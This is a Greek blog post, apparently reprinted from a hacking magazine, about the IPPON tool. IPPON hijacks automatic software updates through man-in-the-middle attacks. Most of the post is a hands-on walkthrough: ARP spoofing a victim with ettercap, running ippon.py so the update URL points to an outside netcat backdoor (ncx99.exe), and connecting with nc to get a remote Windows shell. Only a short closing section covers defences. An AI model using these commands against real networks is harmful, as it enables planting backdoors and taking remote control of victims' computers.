RSS

Προσοχή, είναι πολύ επικίνδυνο όταν γίνονται.. updates!

03 Nov

Αναρωτηθήκατε ποτέ, πόσες φορές ενώ πίνετε τον καφέ σας και διαβάζετε email σας όντες συνδεδεμένοι στο ασύρματο δίκτυο της καφετέριας που βρίσκεστε, έχουν εμφανιστεί μηνύματα για ενημερώσεις των προγραμμάτων και των εφαρμογών που τρέχουν παράλληλα (όπως Scype, Notepad++,Acrobat reader κτλ); Σίγουρα χιλιάδες!! Άραγε μια μηχανική κίνηση για αποδοχή μιας τέτοιας ενημέρωσης θα μπορούσε να αποβεί μοιραία;

Ένας απ’ τους πρώτους και μάλιστα χρυσοποίκιλτα γραμμένους νόμους της σωστής διαχείρισης και λειτουργίας ενός συστήματος (είτε Windows,είτε κάποιου Unixoειδους όπως Linux, Mac OS κτλ) απαιτεί να είναι ενεργές οι αυτόματες ενημερώσεις (updates) στα προγράμματα και τις εφαρμογές που χρησιμοποιούνται απ’ τον χρήστη (ή τους χρήστες) του μηχανήματος. Με τον τρόπο αυτό, ανά τακτά χρονικά διαστήματα γίνονται οι απαραίτητες αναβαθμίσεις στα προγράμματα και εφαρμογές καθημερινής χρήσης, με τα όλα καινούρια patches (μπαλώματα) καθώς και bug fixes (διορθώσεις σε bugs). Έτσι βελτιστοποιείτε η λειτουργιά τους καθώς επίσης αποφεύγεται η οποιαδήποτε εκμετάλλευση πιθανών κενών ασφαλείας που μπορεί να προκύψουν σε παλιότερες εκδόσεις.

Τι γίνετε όμως όταν μια επίθεση εκτελείται κατά τη διάρκεια του αυτόματου update, χρησιμοποιώντας μάλιστα τη διαδικασία αυτή ως backdoor; Ε,τότε σίγουρα τα πράγματα αρχίζουν να γίνονται αρκετά δύσκολα και σαφώς πολύ επικίνδυνα για το θύμα, το οποίο δείχνει πραγματικά ανυπεράσπιστο.

Στα μέσα του χειμώνα έχουμε βαλθεί να σας ξυπνήσουμε μνήμες καλοκαιριού. Σίγουρα δε μιλάμε για καλοκαιρινές διακοπές και ξέφρενα γλέντια στην αμμουδιά, αλλά αναφερόμαστε στο μεγαλύτερο Χακερο-πάρτι του πλανήτη, που λαμβάνει χώρα στο Las Vegas και ακούει στο όνομα DefCon.

Στο DefCon υπ’ αριθμόν 17 μια μικρή εφαρμογή εξολοκλήρου γραμμένη σε python η οποία παρουσιάστηκε απ’ τους αναλυτές Itzik Kotler και Tomer Bitto κέντρισε το ενδιαφέρον του κοινού και κάνοντας αισθητή την παρουσία της. Το όνομα αυτής ΙPPOΝ και θα θέλαμε στο σημείο αυτό να πληροφορήσουμε όσους αναγνώστες δεν το γνωρίζουν, ότι IPPON σημαίνει Game Over στο Judo.

Το IPPON χρησιμοποιώντας την τεχνική εξαπάτησης ΜΙΤΜ (Μan Ιn Τhe Μiddle) καταφέρνει να ξεγελά τους μηχανισμούς αυτόματων ενημερώσεων (updates) σε προγράμματα ευρέως γνωστά και χρησιμοποιούμενα από χιλιάδες χρήστες ανά τον κόσμο όπως:
[list]

  • Acrobat Reader (της Adobe)
  • Alcohol 120
  • Notepad++
  • GOM Player
  • iMesh
  • Skype
  • Hex Workshop
    …και άλλα πολλά!

Λίγη θεωρία σχετικά με το IPPON.
Κάθε φορά που μια εφαρμογή θέλει να ενημερωθεί, αυτόματα απευθύνεται στον επίσημο δικτυακό τόπο που έχει ορίσει ο κατασκευαστής και ελέγχει τα κατάλληλα αποθετήρια (repositories) για διαθέσιμες ενημερώσεις (Εικόνα 1).

Εικόνα 1: Το θύμα επικοινωνεί με ένα γνήσιο server και τον ρωτάει αν υπάρχουν διαθέσιμα updates ώστε να ενημερώσει την σχετική εφαρμογή. Ο server αποκρίνεται θετικά και το downloading ξεκινά.

Έτσι ο κακόβουλος χρήστης που βρίσκετε πίσω απ’ το IPPON κάνοντας μια επίθεση ΜΙΤΜ (Μan Ιn Τhe Μiddle) καταφέρνει να παρεμβληθεί μεταξύ του θύματος και του επίσημου αποθετηρίου. Κάτι τέτοιο έχει ως αποτέλεσμα, κάθε φορά που μια απ’ τις προαναφερθείσες -ευπαθείς- εφαρμογές ελέγχει για διαθέσιμα update, αντί να επικοινωνεί με τον επίσημο δικτυακό τόπο του κατασκευαστή στην πραγματικότητα επικοινωνεί με το IPPON το οποίο έχει παρεμβληθεί μεταξύ των δυο (server και θύμα) και ύπουλα εκτελεί χρέη αποθετηρίου .Στη συνέχεια το ΙPPON ενημερώνει την εφαρμογή για την ύπαρξη ενός νέου update (στην πραγματικότητα πλαστού!) κι εκείνη χωρίς να μπορεί να αντιληφθεί ότι πρόκειται για πλάστη ειδοποίηση ενημέρωσης, σπεύδει να την κατεβάσει και να την εγκαταστήσει (Εικόνα 2).

Εικόνα 2: Κάποιος κακόβουλος χάκερ έχει παρεμβληθεί μεταξύ του server και του θύματος και προσποιούμενος τον server ενημερώνει το θύμα του για διαθέσιμο update. Το θύμα χωρίς να μπορεί να αντιληφθεί την κομπίνα κατεβάζει το κακόβουλο αρχείο.

Κι έτσι γίνεται, μόνο που στην πραγματικότητα αυτό που λαμβάνει κι εγκαθιστά δεν είναι το αναμενόμενο update αλλά ένα κακόβουλο πρόγραμμα, όπως για παράδειγμα ένα trojan hourse που μπορεί να έχει κατασκευάσει ο επιτιθέμενος (βλ. TotalXAKER τεύχη 27, 28, 29) ή απλά ένα πρόγραμμα που ανοίγει μια θύρα επικοινωνίας στον Η/Υ του θύματος παραχωρώντας έτσι ελεύθερη πρόσβαση στον επιτιθέμενο.


Εικόνα 3: Το IPPON προσποιείται το ελεύθερο Access Point, αλλά κανείς δεν ξέρει ότι sniffαρει όλα τα πακέτα όσων συνδέονται σε αυτό και στη συνεχεία τους στέλνει κακόβουλα αρχεία σε μορφή update.

Σενάριο Επίθεσης σε LAN.
Για το εγχείρημα μας θα χρησιμοποιήσουμε δυο μηχανήματα. Ένα (εικονικό) μηχάνημα με λειτουργικό σύστημα Linux Fedora 12 στον ρόλο του επιτιθέμενου , καθώς και ένα (εικονικό) μηχάνημα Windows XP SP3 στο ρόλο του θύματος (για άλλη μια φορά!).

Υποθέτουμε ότι ο επιτιθέμενος και το θύμα βρίσκονται στο ίδιο ενσύρματο δίκτυο (LAN). Για να επιτευχθεί η εξαπάτηση του θύματος, το πρώτο πράγμα που πρέπει να γίνει είναι να επιτευχθεί το λεγόμενο Arp Spoofing. Το Arp Spoofing είναι μια επίθεση που στόχο της έχει το πρωτόκολλο ARP (Address Resolution Protocol).Ο κακόβουλος χρήστης παρεμβαλλόμενος ,κάνοντας δηλαδή MITM, καταφέρνει να παραπλανά τους συνδεδεμένους χρήστες του δικτύου αναγκάζοντας τους να του αποστέλλουν όλα τα δεδομένα που ανταλλάσσουν μεταξύ τους φυσικά χωρίς εκείνοι να μπορούν να το αντιληφθούν.

Ένας απλός τρόπος για να επιτύχουμε εύκολα και απλά Arp Spoofing είναι να χρησιμοποιήσουμε το αγαπημένο μας εργαλείο ettercap. Στο πείραμα μας θα κάνουμε χρήση της GTK έκδοσης δηλαδή με γραφικό περιβάλλον.

Για να το κατεβάσουμε θα δώσουμε στο τερματικό:

[root@Fedora12 pr0n]# yum install ettercap-gtk

Αφού ολοκληρωθεί η εγκατάσταση, (παραμένοντας στο λογαριασμό του χρήστη root) γράφουμε:

[root@Fedora12 pr0n]# ettercap -G

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

H παράμετρος [b]“-G”[/b] που εισάγαμε θα εμφανιστεί το γραφικό περιβάλλον της εφαρμογής του ettercap. Πλέων είμαστε έτοιμοι για την εξαπάτηση του θύματος. Αφού έχουμε ενεργοποιήσει το ettercap και έχουμε βεβαιωθεί ότι βρισκόμαστε σε promisc mode (options και μετά κλικ στο promisc mode) πάμε απ’ το κύριο menu και πατάμε:
Snif –> Unified Sniffing..
Εκεί επιλέγουμε το Network Interface που θέλουμε να snifάρουμε (στην περίπτωση μας είναι το “eth0”) και πατάμε “OK”. (Εικόνα 4)


Εικόνα 4: Το network interface που βρίσκετε το θύμα και ο επιτιθέμενος είναι το eth0!

Hosts –> Scan for hosts
Στη συνέχεια θα χρειαστεί να scanάρουμε το network interface που ορίσαμε στο προηγούμενο βήμα για τα προς εξαπάτηση διαθέσιμα hosts.(Εικόνα 5)


Εικόνα 5: Ένα scanάρισμα θα δώσει αρκετές πληροφορίες σχετικά με τα πιθανά θύματα και τις ip τους.

Όπως μπορούμε να παρατηρούμε στο κεντρικό παράθυρο της εφαρμογής, έχουν εμφανιστεί οι ακόλουθες πληροφορίες σχετικά με το αποτέλεσμα του scanαρίσμοτος:

Scanning the whole netmask for 255 hosts...
6 hosts added to the hosts list...

Στη συνέχεια αφού έχει ολοκληρωθεί το scanάρισμα πατάμε “Host lists” ώστε να “δούμε” όλα τα διαθέσιμα hosts. Ο στόχος μας είναι ο Η/Y με ip 192.168.0.126. Οπότε, επιλέγουμε την ip 192.168.0.126 και πατάμε το κουμπί “Add Το Target 1” και αντίστοιχα, ορίζουμε και την Ip 192.168.0.1 όπου αντιστοιχεί στην ip του gateway και πατάμε το κουμπί “Add Το Target 2” (Εικόνα 6)


Εικόνα 6: Το θύμα εντοπίστηκε και ορίστηκε σαν στοχος μαζί με το Gateway.

Το αποτέλεσμα που θα εμφανιστεί στο κεντρικό παράθυρο θα είναι κάτι σαν:

Host 192.168.0.126 added to TARGET1
Host 192.168.0.1 added to TARGET2

Αφού τελειώσαμε με τις γενικές ρυθμίσεις ήρθε η ώρα να ξεκινήσουμε το arp spoofing.
Απ’ το κεντρικό menu επιλέγουμε mitm –> arp spoofing και στο αναδυόμενο παράθυρο επιλέγουμε “ΟΚ”. (εικόνα 7)

Έτσι καταχωρήθηκαν τα δυο θύματα, η ip που έχουμε ορίσει ως προς εξαπάτηση καθώς και η ip του gateway.

Εικόνα 7: Με μια επιλογή το ettercap μας δίνει τη δυνατότητα για mitm και arp spoofing, τόσο εύκολα και γρήγορα!

ARP poisoning victims:

 GROUP 1 : 192.168.0.126 08:00:27:29:21:19

 GROUP 2 : 192.168.0.1 00:E0:7D:84:BC:BD

Για τελευταία φορά επιστρέφουμε στο κύριο menu και πατάμε:
Start –> Start Sniffing (εικόνα 8 )

Εικόνα 8:Το ettercap άρχισε το arp spoofing μεταξύ του επιτιθέμενου και των δυο στόχων του.

Είμαστε επιτέλους έτοιμοι….

Τη σκυτάλη παίρνει το IPPON!
Αφού με τη διαδικασία που προηγήθηκε έχουμε ρυθμίσει επιτυχώς το ettercap ώστε να παρεμβάλλεται μεταξύ του θύματος με την IP 192.168.0.126 και του Gateway με ip 192.168.0.1, σειρά έχει να κατεβάσουμε το ippon-mitm. Κάτι τέτοιο δεν είναι δύσκολο φτάνει να πλοηγηθούμε στο επίσημο site (http://code.google.com/p/ippon-mitm/) και να το κατεβάσουμε. Φυσικά ένας δεύτερος τρόπος, σίγουρα πιο απλός, είναι να το κατεβάσουμε μέσω του τερματικού κάνοντας χρήση της εντολής wget.

[pr0n@Fedora12 ~]$ wget http://ippon-mitm.googlecode.com/files/IPPON_dc17.zip

Για την σωστή εκτέλεση της εφαρμογής ippon.py θα χρειαστεί φυσικά να έχουμε εγκατεστημένη στο σύστημα μας την Python απ’ την έκδοση 2.5 και νεότερη. Σε περίπτωση που δεν είναι ήδη εγκατεστημένη θα πρέπει να γράψουμε στο τερματικό:

[pr0n@Fedora12 ~]$ su -c 'yum install python’

Επίσης, ένα απαραίτητο module είναι το Scapy .Αν βρισκόμαστε σε λειτουργικό σύστημα Fedora (όπως στο παράδειγμα μας) για να το κατεβάσουμε, θα πρέπει να γράψουμε στο τερματικό:

[pr0n@Fedora12 ~]$ su -c 'yum install scapy’

ενώ αντιστοιχία αν βρισκόμασταν σε λειτουργικό σύστημα Linux Ubuntu θα γράφαμε :

pr0n@Ubuntu:~$ sudo apt-get install python-scapy

[color=”#FFFF00″]Σημείωση:[/color]
Το όνομα του module scapy μπορεί να είναι διαφορετικά από κάποια έκδοση linux σε κάποια άλλη οπότε ανάλογα με τη έκδοση του ο καθένας καλό είναι να ψάξει πως αναφέρεται το scapy στα διαθέσιμα repositories.

Τέλος θα χρειαστούμε το Ubigraph alpha-0.2.4 (http://ubietylab.net/ubigraph/). Το Ubigraph (για όσους δεν το έχουν ξανά δουλέψει στο παρελθόν) είναι ένα module για τρισδιάστατες απεικονίσεις και αναπαραστάσεις. Για να το εγκαταστήσουμε θα χρειαστεί να πλοηγηθούμε στη σελίδα http://ubietylab.net/ubigraph/ και ανάλογα με την έκδοση του λειτουργικού που έχουμε, θα επιλέξουμε και το αντίστοιχο αρχείο για downloading. Αν δεν ενδιαφερόμαστε για τρισδιάστατη live απεικόνιση της τοπολογίας του δικτύου, μια επιλογή που μας προσφέρει το IPPON,απλά θα ανοίξουμε τον κώδικα του ippon.py με έναν οποιονδήποτε κειμενογράφο και μπροστά απ’ το “import Ubigraph” ,στη 16η γραμμή, βάζουμε ένα “#” ώστε το συγκεκριμένο module να μην είναι αναγνώσιμο κατά τη διαδικασία της εκτέλεσης.Στη συνέχεια το σώζουμε και το κλείνουμε. Με τον τρόπο αυτό δεν θα χρειαστεί να εγκαταστήσουμε και το συγκεκριμένο module αν δεν θέλουμε.

Είμαστε πλέων έτοιμοι να ξεκινήσουμε!
Χωρίς να κλείσουμε το τερματικό που τρέχει το ettercap ανοίγουμε μια νέα καρτέλα τερματικού και εκεί αφού μεταβούμε στο κατάλογο πού βρίσκετε το IPPON_dc17.zip το αποσυμπιέσουμε και εν’ συνεχεία εισερχόμαστε στο φάκελο που δημιουργήθηκε κατά την αποσυμπίεση, με την ονομασία IPPON.

Τέλος, ενώ βρισκόμαστε στο φάκελο που περιέχει το ippon.py το εκτελούμε δίνοντας τις παρακάτω παραμέτρους:

ippon.py -i onoma_interface targets.xml -u http://kako_site/server.exe

 

[pr0n@Fedora12 ~]$ cd /home/pr0n/IPPON
[pr0n@Fedora12 IPPON]$ su
Password:
[root@Fedora12 IPPON]# python ippon.py -i eth0 targets.xml -u http://packetstormsecurity.org/9906-exploits/ncx99.exe

Με την παράμετρο “-i” ορίζουμε στο IPPON να βλέπει σαν network interface το “eth0” και στη συνέχεια για την εξαπάτηση των μηχανισμών update που έχουν τα προγράμματα του θύματος να χρησιμοποιεί το αρχείο targets.xml. Το εν ‘λόγο αρχείο είναι μια μικρή βάση δεδομένων μέσα στην οποία αναγράφονται πληροφορίες σχετικά με τις διευθύνσεις που σχετίζονται με τα updates του κάθε ευπαθούς προγράμματος.

Τέλος ορίσαμε στο IPPON, κάθε φορά που κάποιο απ’ τα ευπαθή προγράμματα που βρίσκονται στον Η/Υ του θύματος ζητάει update αντί για το επίσημο site που έχει ορίσει ο κατασκευαστής να τα ανακατευθύνει στη διεύθυνση http://packetstormsecurity.org/9906-exploits/ncx99.exe με απώτερο σκοπό, αντί για κάποιο επίσημο update, να κατεβάσει στον H/Y του θύματος μια χακαρισμένη έκδοση του netcat (ncx99.exe) η οποία όταν εκτελεστεί απ’ το θυμα ανοίγει την port 99 για επικοινωνία με τον επιτιθέμενο. (Εικόνα 9)


Εικόνα 9: Η επίθεση με το IPPON έχει ξεκινήσει και όλα δείχνουν να πηγαίνουν ρολόι. Ας περιμένουμε το θύμα μας!

Ας δούμε όμως τι γίνετε στην αντίπερα όχθη, δηλαδή στην πλευρά του θύματος.
Με το που το θύμα μας θα εκτελέσει κάποιο πρόγραμμα απ’ τα προαναφερθέντα όπως για παράδειγμα το notepad++ θα πληροφορηθεί για ένα νέο Update που εκκρεμεί (Εικόνα 10).


Εικόνα 10: Ένα νέο update έτοιμο προς εγκατάσταση!

Στην περίπτωση που το αποδεχτεί η διαδικασία του downloading θα ξεκινήσει και θα ολοκληρωθεί άκρως φυσιολογικά. Στην πραγματικότητα όμως, όπως μπορούμε να δούμε και στην εικόνα 12 το notepad++ δεν έχει κατεβάσει κάποια σχετική ενημέρωση αλλά αντιθέτως έχει κατεβάσει και στη συνέχεια έχει εκτελέσει το ncx99.exe που του είχε στείλει ο επιτιθέμενος.


Εικόνα 12: Αντί για το αναμενόμενο update, ο updater του notepad++ εκτέλεσε το backdoor που είχε στείλει ο επιτιθέμενος.

Απ’ τη στιγμή που το ncx99.exe θα εκτελεστεί στον Η/Υ του θύματος , αν ο επιτιθέμενος εισάγει στο τερματικό του την εντολή:

[pr0n@Fedora12 IPPON]$ nc 192.168.0.126 99 

Μέσω του netcat να συνδεθεί στην IP 192.168.0.126 κάνοντας χρήση της port 99 ,που άνοιξε όταν εκτελέστηκε απ’ το θύμα το αρχείο ncx99.exe, θα καταφέρει να αποκτήσει απομακρυσμένη πρόσβαση στον Η/Υ του θύματος.

[pr0n@Fedora12 IPPON]$ nc 192.168.0.126 99
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Notepad++\updater>  


Εικόνα 13: Game Over – Όλα τελείωσαν για το θύμα αφού έχει επιτευχθεί απομακρυσμένη πρόσβαση στον σκληρό του δίσκο.

Σημείωση: Μπορεί για αυτό το παράδειγμα να χρησιμοποιήσαμε ένα πασίγνωστο και “χοντροκομμένο“ backdoor ώστε να γίνει περισσότερο αντιληπτό το μεγαλείο της συγκεκριμένης επίθεσης. Να ‘στε σίγουροι όμως ότι θα μπορούσαμε να χούμε στείλει στο θύμα μας κάποιο πλήρως καμουφλαρισμένο trojan horse (βλ totalXAKER τεύχος 29) το οποίο δε θα μπορούσε να γίνει εύκολα αντιληπτό.

Προσοχή: Το IPPON λειτουργεί και σε LAN και σε WLAN. Η εξαπάτηση σε ένα LAN όπως είδαμε, στηρίζεται στη τεχνική του Arp Spoofing. Στο WLAN τα πράγματα δε διαφοροποιούνται σχεδόν καθόλου. Καταρχάς θα πρέπει οριστεί η ασύρματη κάρτα του επιτιθέμενου σε monitor mode ,το οποίο είναι κάτι αντίστοιχο με το promisc mode που ορίσαμε στο ettercap κατά τη διαδικασία του arp spoofing. Όταν μια κάρτα βρίσκεται σε monitor mode μπορεί να λάβει όλα τα πακέτα που διακινούνται στο ασύρματο δίκτυο. Τέλος το ΙPPON εμφανίζεται ως ελεύθερο Access Point ώστε να παραπλανά τους υπόλοιπους χρήστες και να συνδέονται σε αυτό.(Εικόνα 3). Αν κάποιος χρησιμοποιήσει το IPPON σε συνδυασμό με το ettercap για επίθεση σε WLAN, όπως κάναμε με το LAN, οι ρυθμίσεις είναι ακριβώς ίδιες με τη διάφορα ότι αντί για “eth0” το network interface που θα οριστεί θα πρέπει να ναι το wlan0 (ή όπως αλλιώς λέγετε το ασύρματο δίκτυο).Αν όχι, θα πρέπει να ορίσει τη κάρτα του manually σε monitor mode και στη συνέχεια να προσθέσει την παράμετρο “-w” κατά τη σύνταξη του IPPON.

[root@Fedora12 IPPON]# python ippon.py -w -i wlan0 targets.xml -u http://packetstormsecurity.org/9906-exploits/ncx99.exe

Το αντίδοτο κατά του IPPON
Σίγουρα την απόλυτη προστασία σε τέτοιες επιθέσεις δε μπορούμε να την επιτύχουμε!.Αυτό όμως που μπορούμε να κάνουμε είναι να σας συστήσουμε μια σειρά μέτρων τα οποία συνδυαστικά μπορούν να δυσκολέψουν αρκετά τους επίδοξους κακόβουλους επιτιθέμενους.

Ποτέ μα ποτέ, δεν πρέπει να ενημερώνουμε (update) τις εφαρμογές και τα προγράμματα του σύστημα μας ενώ βρισκόμαστε σε κάποιο δίκτυο το οποίο δεν ξέρουμε,δε εμπιστευόμαστε και δεν είμαστε σίγουροι για το ποιοι άλλοι είναι συνδεδεμένοι σε αυτό και στην ουσία τι κάνουν χρησιμοποιώντας το. Τέτοια παραδείγματα προς αποφυγή αποτελούν όλα τα ελεύθερα Access Pointς όπως, εστιατόρια, καφετέριες, εμπορικά καταστήματα κ.α.

Σε περίπτωση που θέλουμε να ενημερώσουμε κάποια εφαρμογή μας αλλά δεν είμαστε σε ασφαλές δίκτυο, επιβάλλεται η χρήση του πρωτοκόλλου κρυπτογράφησης HTTPS και αυτό πάντα σε συνδυασμό με ψηφιακά υπογεγραμμένες ενημερώσεις (digitally-signed updates). Ένα χαρακτηριστικό παράδειγμα τέτοιας χρήσης ενημερώσεων αποτελεί η εφαρμογή Firefox,πράγμα που την καθιστά άτρωτη σε τέτοιου είδους επιθέσεις πλαστογράφησης!

Τέλος στον H/Y που χρησιμοποιούμε καλό είναι να υπάρχουν προγράμματα όπως το ARPDetective του φίλου oblique το οποίο είναι μια εφαρμογή γραμμένη σε python και η οποία ειδοποιεί τον χρήστη για ό,τι απόπειρες πλαστοπροσωπίας επιχειρούνται στο δίκτυο που βρίσκετε συνδεδεμένος.

Και μην ξεχνάτε, όσο πιο πολλά μέτρα προστασίας παίρνετε τόσο πιο ασφαλείς μπορείτε να γίνεται!

 
Leave a comment

Posted by on November 3, 2011 in It's Greek to Me

 

Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: